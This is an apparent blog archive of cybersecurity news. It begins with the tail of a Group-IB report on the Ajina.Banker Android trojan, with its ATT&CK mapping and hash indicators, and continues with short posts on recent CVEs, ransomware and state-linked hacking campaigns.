The case of Ajina highlights how quickly malware developers can appear, set up distributional chains and evaluate their tools. The direct communication between the threat actor and victim also makes Ajina.Banker an effective malware type in terms of keeping low detect rate on the first stages. While Group-IB does not have definitive data on the amount of money stolen by Ajina, the methods harnessed by malicious actors are cause for concern.

Recommendations

The security of mobile applications and operating systems is improving rapidly. However, it is premature to completely write-off Android banking Trojans entirely. In our experience, banking Trojans are still highly active, with threat actors widely distributing modified Trojans based on publicly available source code.

A good example of this trend is Ajina.Banker, which poses a significant threat not only to end-users of banking applications but also the entire banking sector itself.

For users

Below are some basic recommendations on protecting mobile devices from banking Trojans like Ajina.Banker.

Always check for updates on your mobile device. Maintaining your mobile devices updated will make them less vulnerable to such threats.
Avoid downloading applications from sources other than Google Play. However, it’s important to note that even Google Play cannot guarantee complete security. Always check the permissions that an application requests before installing it.
Do not click on links contained within suspicious SMS messages.

If your device has been infected, do the following:

Disable network access.
Freeze any bank accounts that may have been accessed from your device.
Contact experts to receive detailed information about the risks that the malware could pose to your device.

For organizations

The Group-IBThreat Intelligence team will continue to track Ajina.Banker and update our database with new indicators related to this trojan. Additionally, our Threat Intelligence team will notify customers when their application is targeted by Ajina.Banker, or any other Android malware we track.

For organizations that wish to protect their customers, implementing a solution that monitors user sessions – such as Group-IB Fraud Protection – can prevent malware operators from defrauding their clients and damaging their reputations.

Group-IB’s Fraud Protection detects the latest fraud techniques, phishing preparation, and other types of attacks. The platform integrates data from Group-IB’s attribution-based Threat Intelligence system. Exclusive information about cybercriminals, malware, adversary IP addresses, and compromised data (logins, passwords, bank cards) helps develop anti-fraud systems and cybersecurity teams, which allows the latter to identify intruders and their actions.

In this way, Fraud Protection “catches” banking Trojans and detects unauthorized remote access, web injections, cross-channel attacks, and personal data collection. Group-IB’s solution implements patented algorithms that help detect infected devices without the client’s involvement and without installing additional software.

Fraud Matrix

Tactic	Technique	Procedure
Resource development	Malware	Attackers use Ajina.Banker malware to gain access to user accounts
	Scam workers	Attacker has a network of affiliated employees acting with financial motivation, spreading Ajina.Banker that victimizes ordinary users
	Social Network Account	Attackers use Telegram accounts to spread Ajina.Banker
Trust abuse	Bluffing	Attackers promise easy earnings and lucrative offers to convince end users to install Ajina.Banker
	Fake application	Ajina.Banker mimics popular banking apps and payment systems
	Enabling Accessibility Service for Malware	Ajina.Banker asks for Accessibility Service permission to prevent uninstallation or uninstall itself
End-user interaction	Phishing	Ajina.Banker expended malicious applications via Telegram
	Pushing to install Android Malware	Attackers requires users to download, install the .APK file manually
	Scam ads	The description of Ajina.Banker in Telegram is accompanied by an advertising description offering bonuses and cash rewards
	Scam Message in Social Network/Instant Messenger	Ajina.Banker is promoted through mailings in Telegram groups and in personal messages
Credential access	Phone Number Capture	Ajina.Banker makes a USSD request to get the phone number to be sent to the gate server
	2nd Factor Capture	Ajina.Banker reads all SMS including authentication codes, allowing fraudsters to pass the 2nd Factor
	Card PAN/EXP/CVV Capture	Attackers, after logging into a user’s account, are able to obtain full information about the user’s bank cards
	Credential Capture	Having access to a user account allows attackers to gain full information about the account holder
	SMS/Push Interception	Ajina.Banker collects all SMS on the user’s device, even SMS from non-target organizations
Account access	Access from Fraudster Device	Attackers log into the account from a new device with the user’s phone number and confirmation SMS

MITRE ATT&CK® Matrix

Tactic	Technique	Procedure
Initial Access (TA0027)	Phishing (T1660)	Ajina spreaded malicious applications via Telegram.
Persistence (TA0028)	Event Triggered Execution: Broadcast Receivers (T1624.001)	Ajina.Banker registers to receive system-wide broadcast intents such as receiving SMS message, device boot completion, network changes, battery charging state changes, locking and unlocking the screen.
Defense-evasion (TA0030)	Indicator Removal on Host: Uninstall Malicious Application (T1630.001)	Ajina.Banker can uninstall itself.
Defense-evasion (TA0030)	Masquerading: Match Legitimate Name or Location (T1655.001)	Ajina.Banker mimics legitimate applications, trying to match their names and icons.
Credential-access (TA0031)	Access Notifications (T1517)	Ajina.Banker can access SMSes.
Discovery (TA0032)	Software Discovery (T1418)	Ajina.Banker checks for presence of some hardcoded applications (mostly banks).
Discovery (TA0032)	System Network Configuration Discovery (T1422)	Ajina.Banker checks for SPN and then sends a USSD request to get the phone number.
Collection (TA0035)	Access Notifications (T1517)	Ajina.Banker can access the notifications.
Collection (TA0035)	Protected User Data: SMS Messages (T1636.004)	Ajina.Banker can access the SMS messages.
Command-and-control (TA0037)	Non-Standard Port (T1509)	Ajina.Banker sends data in raw TCP to 8080 port.
Exfiltration (TA0036)	Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1639.001)	Ajina.Banker exfiltrates data to the gate server.

Indicators of compromise

md5	sha1	sha256
4b0256974d7250e3ddc3d13d6c506f4f	cc6af149f1da110a570241dde6e3cfd0852cb0d8	a523d967e7bdfbb7ce899445f705925e7c6e11c39db0fb77b8aed3b4615eb17b
a61c0d53f624024d401c987032270e7d	2405e7b762e65011f7d107b2b2bcf069a18a5278	44b8898a37153238185befdbf59e0e6de4efec302082f74992a7120a416f2008
34a42857113ab2c856d533105494eb41	8a3c5e0c0438588640fbf4afe3a9c176a8204eec	1e531605566061e47153f53bba14451eb4b182251f328c62dd7240a19b7fe6e3
bf20e58236c2020cd5eeceff0bf7974c	209aa1222bf59dd397aa38779cb0f48dcc961424	3897324fdf1ef6deb528b65c047017318a13c87f0b68f1eacee1fad256256b51
7f2e9aa66f802727a52eeec72ed2d458	84af2ce3a2e58cc8a70d4cc95916cbfe15f2169e	8269b64b8cf38bdaa1b632968dc69172fcc830e9ad0c00cd6bebc586dec4af1f
00241d7334d78340cd5eb721f40b8682	15de15a6f4af9c32cccbee23d99b80d33f3dcb50	2e592aacdad946249111ac6ecaa1614fe55091adcf00495936b106cd5707ca35
48eb80adac9c2c9bd046c8f3da8c7f58	7f4b4f2b941e4472ece092a409099716aadcf16b	f4f3d2bd5eee5a1f0632314abf5d540c03e97c0d2afe155439a533a030b792f2

CISA adds SolarWinds Web Help Desk bug to its Known Exploited Vulnerabilities catalog

Posted on August 17, 2024 - August 17, 2024 by Maq Verma

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a SolarWinds Web Help Desk bug to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SolarWinds Web Help Desk deserialization of untrusted data vulnerability, tracked as CVE-2024-28986 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog.

This week SolarWinds fixed the vulnerability in SolarWinds’ Web Help Desk solution for customer support. The flaw is a Java deserialization issue that an attacker can exploit to run commands on a vulnerable host leading to remote code execution.

SolarWinds describes WHD as an affordable Help Desk Ticketing and Asset Management Software that is widely used by large enterprises and government organizations.

“SolarWinds Web Help Desk was found to be susceptible to a Java Deserialization Remote Code Execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. While it was reported as an unauthenticated vulnerability, SolarWinds has been unable to reproduce it without authentication after thorough testing.” reads the advisory published by Solarwinds. “However, out of an abundance of caution, we recommend all Web Help Desk customers apply the patch, which is now available.”

The vulnerability CVE-2024-28986 impacts all Web Help Desk versions. The software firm urges customers to upgrade to WHD 12.8.3 all versions of Web Help Desk (WHD), and then install the hotfix.

The vulnerability was discovered by researchers at the company’s security firm. The company also thanked Inmarsat Government/Viasat for their assistance.

Users can find a step-by-step procedure to install the hotfix here.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by September 5, 2024.

Microsoft urges customers to fix zero-click Windows RCE in the TCP/IP stack

Posted on August 17, 2024 - August 17, 2024 by Maq Verma

Microsoft addressed a critical zero-click Windows remote code execution (RCE) in the TCP/IP stack that impacts all systems with IPv6 enabled.

Microsoft urges customers to fix a critical TCP/IP remote code execution (RCE) flaw, tracked as CVE-2024-38063 (CVSS score 9.8), in the TCP/IP stack. The vulnerability impacts all systems with IPv6 enabled (IPv6 is enabled by default).

An unauthenticated attacker can exploit the flaw by repeatedly sending IPv6 packets, including specially crafted packets, to a Windows machine which could lead to remote code execution.

Microsoft confirmed that a threat actor can exploit this flaw in a low-complexity attack and its exploitability assessment labels the issue as “exploitation more likely.” This label suggests that Microsoft is aware of past instances of this type of vulnerability being exploited.

Kunlun Lab’s XiaoWei discovered the flaw several months ago, he urged customers to apply the patches because the “exploitation is more likely.”

https://platform.twitter.com/embed/Tweet.html?creatorScreenName=securityaffairs&dnt=true&embedId=twitter-widget-0&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOltdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2ZvbGxvd2VyX2NvdW50X3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9iYWNrZW5kIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19yZWZzcmNfc2Vzc2lvbiI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfZm9zbnJfc29mdF9pbnRlcnZlbnRpb25zX2VuYWJsZWQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X21peGVkX21lZGlhXzE1ODk3Ijp7ImJ1Y2tldCI6InRyZWF0bWVudCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3Nob3dfYmlyZHdhdGNoX3Bpdm90c19lbmFibGVkIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19kdXBsaWNhdGVfc2NyaWJlc190b19zZXR0aW5ncyI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdXNlX3Byb2ZpbGVfaW1hZ2Vfc2hhcGVfZW5hYmxlZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdmlkZW9faGxzX2R5bmFtaWNfbWFuaWZlc3RzXzE1MDgyIjp7ImJ1Y2tldCI6InRydWVfYml0cmF0ZSIsInZlcnNpb24iOm51bGx9LCJ0ZndfbGVnYWN5X3RpbWVsaW5lX3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9mcm9udGVuZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9fQ%3D%3D&frame=false&hideCard=false&hideThread=false&id=1823532146679799993&lang=en&origin=https%3A%2F%2Fsecurityaffairs.com%2F167117%2Fhacking%2Fwindows-rce-tcp-ip.html&sessionId=183cb4e10a19b261adf3257aa1366e72f9f1f742&siteScreenName=securityaffairs&theme=light&widgetsVersion=2615f7e52b7e0%3A1702314776716&width=500px

The flaw is a buffer overflow issue that can be exploited to achieve arbitrary code execution on vulnerable Windows 10, Windows 11, and Windows Server systems.

https://platform.twitter.com/embed/Tweet.html?creatorScreenName=securityaffairs&dnt=true&embedId=twitter-widget-1&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOltdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2ZvbGxvd2VyX2NvdW50X3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9iYWNrZW5kIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19yZWZzcmNfc2Vzc2lvbiI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfZm9zbnJfc29mdF9pbnRlcnZlbnRpb25zX2VuYWJsZWQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X21peGVkX21lZGlhXzE1ODk3Ijp7ImJ1Y2tldCI6InRyZWF0bWVudCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3Nob3dfYmlyZHdhdGNoX3Bpdm90c19lbmFibGVkIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19kdXBsaWNhdGVfc2NyaWJlc190b19zZXR0aW5ncyI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdXNlX3Byb2ZpbGVfaW1hZ2Vfc2hhcGVfZW5hYmxlZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdmlkZW9faGxzX2R5bmFtaWNfbWFuaWZlc3RzXzE1MDgyIjp7ImJ1Y2tldCI6InRydWVfYml0cmF0ZSIsInZlcnNpb24iOm51bGx9LCJ0ZndfbGVnYWN5X3RpbWVsaW5lX3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9mcm9udGVuZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9fQ%3D%3D&frame=false&hideCard=false&hideThread=false&id=1823684015372870052&lang=en&origin=https%3A%2F%2Fsecurityaffairs.com%2F167117%2Fhacking%2Fwindows-rce-tcp-ip.html&sessionId=183cb4e10a19b261adf3257aa1366e72f9f1f742&siteScreenName=securityaffairs&theme=light&widgetsVersion=2615f7e52b7e0%3A1702314776716&width=500px

XiaoWei pointed out that blocking IPv6 on the local Windows firewall cannot prevent the exploitation of the issue because the vulnerability is triggered before it is processed by the firewall.

Microsoft recommends disabling IPv6 as a mitigation measure.

The issue was addressed by Microsoft with the release of Patch Tuesday security updates for August 2024 that also fixed the following actively exploited flaws:

CVE	Title	Severity	CVSS	Public	Exploited	Type
CVE-2024-38189	Microsoft Project Remote Code Execution Vulnerability	Important	8.8	No	Yes	RCE
CVE-2024-38178	Scripting Engine Memory Corruption Vulnerability	Important	7.5	No	Yes	RCE
CVE-2024-38193	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	Important	7.8	No	Yes	EoP
CVE-2024-38106	Windows Kernel Elevation of Privilege Vulnerability	Important	7	No	Yes	EoP
CVE-2024-38107	Windows Power Dependency Coordinator Elevation of Privilege Vulnerability	Important	7.8	No	Yes	EoP
CVE-2024-38213	Windows Mark of the Web Security Feature Bypass Vulnerability	Moderate	6.5	No	Yes	SFB

Millions of Pixel devices can be hacked due to a pre-installed vulnerable app

Posted on August 17, 2024 - August 17, 2024 by Maq Verma

Many Google Pixel devices shipped since September 2017 have included a vulnerable app that could be exploited for malicious purposes.

Many Google Pixel devices shipped since September 2017 have included dormant software that could be exploited by attackers to compromise them. Researchers form mobile security firm iVerify reported that the issue stems from a pre-installed Android app called “Showcase.apk,” which runs with excessive system privileges, allowing it to remotely execute code and install remote package.

“iVerify discovered an Android package, “Showcase.apk,” with excessive system privileges, including remote code execution and remote package installation capabilities, on a very large percentage of Pixel devices shipped worldwide since September 2017.” reads the report. “The application downloads a configuration file over an unsecure connection and can be manipulated to execute code at the system level”

The issue allows the app to retrieve its configuration file over unsecured HTTP from a single AWS-hosted domain, exposing millions of Android Pixel devices to man-in-the-middle (MITM) attacks. Threat actors could exploit this flaw to inject malicious code, execute commands with system privileges, and take over devices, potentially leading to serious cybercrimes and data breaches.

The “Showcase.apk” package, developed by Smith Micro, is part of the firmware image on millions of Android Pixel phones, potentially enhancing sales in Verizon stores.

The app “Showcase.apk” cannot be removed through the standard uninstallation process, and Google has yet to address the vulnerability. The app is preinstalled in Pixel firmware and included in Google’s OTA updates for Pixel devices. The experts pointed out that although the app is not enabled by default, it can be activated through various methods, one of which requires physical access to the device.

The flawed app is called Verizon Retail Demo Mode (“com.customermobile.preload.vzw”) and requires dozens of permissions for its execution.

The app has been present since August 2016 [1, 2], but there is no evidence that this vulnerability has been exploited in the wild.

“The application fails to authenticate or verify a statically defined domain during retrieval of the application’s configuration file. If the application already maintains a persistent configuration file, it is unclear if additional checks are in place to ensure the configuration parameters for command-and-control or file retrieval are up to date.” continues the report. “The application uses unsecure default variable initialization during certificate and signature verification, resulting in valid verification checks after failure”

The application is vulnerable because its configuration file can be altered during retrieval or transit to the targeted phone. It also fails to handle missing public keys, signatures, and certificates, allowing attackers to bypass the verification process during downloads.

It is important to highlight that an attacker needs physical access to the device and the user’s password to exploit this flaw.

Google said the issue is not a vulnerability in Android or Pixel systems and announced that the app will be removed from all supported in-market Pixel devices with an upcoming Pixel software update.

Google is also notifying other Android OEMs.

iVerify noted that the concern is serious enough that Palantir Technologies is opting to ban Android devices from its mobile fleet over the next few years.

“The Showcase.apk discovery and other high-profile incidents, like running third-party kernel extensions in Microsoft Windows, highlight the need for more transparency and discussion around having third-party apps running as part of the operating system. It also demonstrates the need for quality assurance and penetration testing to ensure the safety of third-party apps installed on millions of devices.” concludes the report. “Further, why Google installs a third-party application on every Pixel device when only a very small number of devices would need the Showcase.apk is unknown. The concern is serious enough that Palantir Technologies, who helped identify the security issue, is opting to remove Android devices from its mobile fleet and transition entirely to Apple devices over the next few years.”

Black Basta ransomware gang linked to a SystemBC malware campaign

Posted on August 16, 2024 - August 16, 2024 by Maq Verma

Rapid7 researchers uncovered a new social engineering campaign distributing the SystemBC dropper to the Black Basta ransomware operation.

On June 20, 2024, Rapid7 researchers detected multiple attacks consistent with an ongoing social engineering campaign being tracked by Rapid7. Experts noticed an important shift in the tools used by the threat actors during the recent incidents.

The attack chain begins in the same way, threat actors send an email bomb and then attempt to call the targeted users, often via Microsoft Teams, to offer a fake solution. They trick users into installing AnyDesk, allowing remote control of their computers.

During the attack, the attackers deploy a credential harvesting tool called AntiSpam.exe, which pretends to be a spam filter updater. This tool prompts users to enter their credentials, which are then saved or logged for later use.

The attackers used various payloads named to align with their initial lure, including SystemBC malware, Golang HTTP beacons, and Socks proxy beacons.

The researchers noticed the use of an executable named update6.exe designed to exploit the vulnerability CVE-2022-26923 for privilege escalation, and reverse SSH tunnels and the Level Remote Monitoring and Management (RMM) tool are used for lateral movement and maintaining access.

“When executed, update6.exe will attempt to exploit CVE-2022-26923 to add a machine account if the domain controller used within the environment is vulnerable.” reads the report published by Rapid7. “The debugging symbols database path has been left intact and indicates this: C:\Users\lfkmf\source\repos\AddMachineAccount\x64\Release\AddMachineAccount.pdb. The original source code was likely copied from the publicly available Cobalt Strike module created by Outflank.”

The SystemBC payload in update8.exe is dynamically retrieved from an encrypted resource and directly injected into a child process with the same name. The original SystemBC file is encrypted with an XOR key, and this key is exposed due to the encryption of padding null bytes between PE sections.

The researchers recommend mitigating the threat by blocking all unapproved remote monitoring and management solutions. AppLocker or Microsoft Defender Application Control can block all unapproved RMM solutions from executing within the environment.

Rapid7 also suggests of:

educating users about IT communication channels to spot and avoid social engineering attacks.
encouraging users to report suspicious calls and texts claiming to be from IT staff.
keeping software updated to protect against known vulnerabilities, including applying the patch for CVE-2022-26923 to prevent privilege escalation on vulnerable domain controllers.

The report also includes Indicators of Compromise for this campaign.

Google disrupted hacking campaigns carried out by Iran-linked APT42

Posted on August 16, 2024 - August 16, 2024 by Maq Verma

Google disrupted a hacking campaign carried out by the Iran-linked APT group APT42 targeting the US presidential election.

Google announced that it disrupted a hacking campaign carried out by Iran-linked group APT42 (Calanque, UNC788) that targeted the personal email accounts of individuals associated with the US elections.

APT42 focuses on highly targeted spear-phishing and social engineering techniques, its operations broadly fall into three categories, credential harvesting, surveillance operations, and malware deployment.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011.

In May and June, nation-state actors targeted former US government officials and individuals associated with the election campaigns of President Biden and former President Trump.

Google announced to have detected and blocked numerous attempts to log in to the personal email accounts of targeted individuals.

“In the current U.S. Presidential election cycle, TAG detected and disrupted a small but steady cadence of APT42’s Cluster C credential phishing activity. In May and June, APT42 targets included the personal email accounts of roughly a dozen individuals affiliated with President Biden and with former President Trump, including current and former officials in the U.S. government and individuals associated with the respective campaigns.” reads the report published by Google.

Some public reports confirm that APT42 has successfully breached accounts across multiple email providers. Google TAG experts reported that the APT group successfully gained access to the personal Gmail account of a high-profile political consultant.

Last week, Donald Trump’s presidential campaign announced it was hacked, a spokesman attributed the attack to foreign sources hostile to the United States. The presidential campaign believes that Iran-linked threat actors may be involved in the cyber operation that is aimed at stealing and distributing sensitive documents. At this time, no specific evidence was provided.

The media outlet POLITICO first reported the hack, it became aware of the security breach after receiving emails from an anonymous account with documents from inside Trump’s operation.

The Trump campaign cited an incident that occurred in June where an Iran-linked APT, Mint Sandstorm, sent a spear-phishing email to a high-ranking campaign official from a compromised account.

The campaign cited a Microsoft report published on Friday that linked Iranian hackers to the spear phishing email sent to an official on a presidential campaign.

“Recent activity suggests the Iranian regime — along with the Kremlin — may be equally engaged in election 2024,” states Microsoft’s report.

APT42 uses social engineering tactics to trick targets into setting up video meetings, which then lead to phishing pages. Attackers used fake Google Meet pages, and lures involving OneDrive, Dropbox, and Skype. In the last six months Google has successfully disrupted the use of Google Sites in over 50 campaigns carried out APT42. Threat actors also used legitimate PDFs to build trust, eventually directing targets to communicate on platforms like Signal or Telegram, where phishing kits are sent to steal credentials.

APT42 employed several phishing kits targeting a variety of sign-on pages including:

GCollection, LCollection, and YCollection are advanced credential harvesting tools designed to collect login information from Google, Hotmail, and Yahoo users. Since their initial observation in January 2023, these tools have been continuously updated to handle multi-factor authentication, device PINs, and recovery codes for all three platforms. The toolkit includes various landing page URLs associated with its indicators of compromise.
DWP: a browser-in-the-browser phishing kit often delivered via URL shortener that is less full featured than GCollection.

APT42’campaings relies on detailed reconnaissance to target personal email addresses that may lack robust security measures. The attackers research the security settings of their targets’ email accounts, using failed login or recovery attempts to understand authentication factors, and adapt their phishing kits accordingly. This approach ensures their attacks appear legitimate, often including geographic location data to avoid detection. Once gained access to the accounts, the Iranian hackers typically modified account settings to enhance their control, such as changing recovery email addresses and exploiting application-specific passwords. Google’s Advanced Protection Program helps mitigate this by disabling these passwords.

“As we outlined above, APT42 is a sophisticated, persistent threat actor and they show no signs of stopping their attempts to target users and deploy novel tactics.” concludes the report. “This spring and summer, they have shown the ability to run numerous simultaneous phishing campaigns, particularly focused on Israel and the U.S. As hostilities between Iran and Israel intensify, we can expect to see increased campaigns there from APT42.”

A massive cyber attack hit Central Bank of Iran and other Iranian banks

Posted on August 16, 2024 - August 16, 2024 by Maq Verma

Iranian news outlet reported that a major cyber attack targeted the Central Bank of Iran (CBI) and several other banks causing disruptions.

Iran International reported that a massive cyber attack disrupted operations of the Central Bank of Iran (CBI) and several other banks in the country. The attack crippled the computer systems of the banks in the country.

Xitter Link

This incident coincides with intensified international scrutiny of Iran’s operations in Middle East, as Teheran announced attacks on Israel unless a ceasefire is achieved in the Gaza conflict. Intelligence experts also blame Iran of attempting to influence the upcoming US Presidential election.

According to Iran International, this is one of the largest cyberattacks on Iran’s state infrastructure to date.

Earlier Wednesday, Iran’s supreme leader, Ayatollah Ali Khamenei, said that “The exaggeration of our enemies’ capabilities is intended to spread fear among our people by the US, Britain, and the Zionists. The enemies’ hand is not as strong as it is publicized. We must rely on ourselves. The enemy’s goal is to spread psychological warfare to push us into political and economic retreat and achieve its objectives.”

“This cyberattack comes at a time of heightened international scrutiny of Iran’s actions in the region as Iran vows to retaliate for the assassination of Hamas leader Ismail Haniyeh earlier this month. The leaders of the UK, France, and Germany issued a joint statement warning Iran that it “will bear responsibility” for any attacks against Israel, which could further escalate regional tensions and jeopardize efforts towards a cease-fire and hostage-release deal.” reported the Israeli website Israel Hayom.

EU leaders urged Iran and its allies to avoid further attacks to avoid a new escalation between Israel and Hamas.

Nation-state actors exploited two zero-days in ASA and FTD firewalls to breach government networks

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

Nation-state actor UAT4356 has been exploiting two zero-days in ASA and FTD firewalls since November 2023 to breach government networks.

Cisco Talos warned that the nation-state actor UAT4356 (aka STORM-1849) has been exploiting two zero-day vulnerabilities in Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023 to breach government networks worldwide.

Cisco Talos researchers tracked this cyber-espionage campaign as ArcaneDoor.

Early in 2024, a customer contacted Cisco to report a suspicious related to its Cisco Adaptive Security Appliances (ASA). PSIRT and Talos launched an investigation to support the customer.

The experts discovered that the UAT4356 group deployed two backdoors, respectively called “Line Runner” and “Line Dancer.”

Cisco reported that the sophisticated attack chain employed by the attackers impacted a small set of customers. The experts have yet to identify the initial attack vector, however, they discovered the threat actors exploited two vulnerabilities (CVE-2024-20353 (denial of service) and CVE-2024-20359 (persistent local code execution)) as zero-days in these attacks.

The Line Dancer in-memory implant that acts as a memory-resident shellcode interpreter that allows adversaries to execute arbitrary shellcode payloads. On compromised ASA devices, attackers utilize the host-scan-reply field to deliver shellcode, bypassing the need for CVE-2018-0101 exploitation. By redirecting the pointer to the Line Dancer interpreter, attackers can interact with the device through POST requests without authentication. Threat actors used Line Dancer to execute various commands, including disabling syslog, extracting configuration data, generating packet captures, and executing CLI commands. Additionally, Line Dancer hooks into the crash dump and AAA processes to evade forensic analysis and establish remote access VPN tunnels.

The Line Runner allows attackers to maintain persistence on compromised ASA devices. It exploits a legacy capability related to VPN client pre-loading, triggering at boot by searching for a specific file pattern on disk0:. Upon detection, it unzips and executes a Lua script, providing persistent HTTP-based backdoor access. This backdoor survives reboots and upgrades, allowing threat actors to maintain control. Additionally, the Line Runner was observed retrieving staged information facilitated by the Line Dancer component.

“ArcaneDoor is a campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns. As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective.” reads the alert published by Cisco, which also includes Indicators of Compromise (IOCs). “Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications.”

Muddling Meerkat, a mysterious DNS Operation involving China’s Great Firewall

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

The China-linked threat actors Muddling Meerkat are manipulating DNS to probe networks globally since 2019.

Infoblox researchers observed China-linked threat actors Muddling Meerkat using sophisticated DNS activities since 2019 to bypass traditional security measures and probe networks worldwide.

The experts noticed a spike in activity observed in September 2023.

The threat actors appear to have the capability to control China’s Great Firewall and were observed utilizing a novel technique involving fake DNS MX records.

Attackers used “super-aged” domains, usually registered before the year 2000, to avoid DNS blocklists and blending in with old malware at the same time

The attackers manipulate MX (Mail Exchange) records by injecting fake responses through China’s Great Firewall. However, the Infoblox researchers have yet to discover the motivation behind the attacks.

“The GFW can be described as an “operator on the side,” meaning that it does not alter DNS responses directly but injects its own answers, entering into a race condition with any response from the original intended destination. When the GFW response is received by the requester first, it can poison their DNS cache.” reads the analysis published by Infoblox. “The GFW creates a lot of noise and misleading data that can hinder investigations into anomalous behavior in DNS. I have personally gone hunting down numerous trails only to conclude: oh, it’s just the GFW.”

The experts noticed that a cluster of activities linked to a threat actor tracked as “ExploderBot” included most demonstrably damaging DNS DDoS attacks, ceased in May 2018. However, low-volume attacks resembling Slow Drip DDoS attacks have persisted since then. These attacks involve queries for random subdomains of target domains, propagated through open resolvers. Despite their lower volumes, these attacks share similar behavioral patterns to DNS DDoS attacks.

Muddling Meerkat’s operations also used MX record queries for random subdomains of target domains, rather than the base domain itself. This scenario is unusual as it typically occurs when a user intends to send email to a subdomain, which is not common in normal DNS activity. The researchers noticed that many of the target domains lack functional mail servers, making these queries even more mysterious.

“The data we have suggests that the operations are performed in independent “stages;” some include MX queries for target domains, and others include a broader set of queries for random subdomains. The DNS event data containing MX records from the GFW often occurs on separate dates from those where we see MX queries at open resolvers.” concludes the report. “Because the domain names are the same across the stages and the queries are consistent across domain names, both over a multi-year period, these stages surely must be related, but we did not draw a conclusion about how they are related or why the actor would use such staged approaches.”

The report also includes indicators of compromise (IoCs) recommendations to neutralize these activities..

NATO and the EU formally condemned Russia-linked APT28 cyber espionage

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

NATO and the European Union formally condemned cyber espionage operations carried out by the Russia-linked APT28 against European countries.

NATO and the European Union condemned cyber espionage operations carried out by the Russia-linked threat actor APT28 (aka “Forest Blizzard”, “Fancybear” or “Strontium”) against European countries.

This week the German Federal Government condemned in the strongest possible terms the long-term espionage campaign conducted by the group APT28 that targeted the Executive Committee of the Social Democratic Party of Germany.

“The Federal Government’s national attribution procedure regarding this campaign has concluded that, for a relatively long period, the cyber actor APT28 used a critical vulnerability in Microsoft Outlook that remained unidentified at the time to compromise numerous email accounts.” reads the announcement published by the German Bundesregierung.

The nation-state actor exploited the zero-day flaw CVE-2023-23397 in attacks against European entities since April 2022. The Russia-linked APT also targeted NATO entities and Ukrainian government agencies.

The vulnerability is a Microsoft Outlook spoofing vulnerability that can lead to an authentication bypass.

In December 2023, Palo Alto Networks’ Unit 42 researchers reported that the group APT28 group exploited the CVE-2023-23397 vulnerability in attacks aimed at European NATO members.

The experts highlighted that over the previous 20 months, the APT group targeted at least 30 organizations within 14 nations that are probably of strategic intelligence significance to the Russian government and its military.

In March 2023, Microsoft published guidance for investigating attacks exploiting the patched Outlook vulnerability tracked as CVE-2023-23397.

In attacks spotted by Microsoft’s Threat Intelligence at the end of 2023, the nation-state actor primarily targeted government, energy, transportation, and non-governmental organizations in the US, Europe, and the Middle East.

According to Unit 42, APT28 started exploiting the above vulnerability in March 2022.

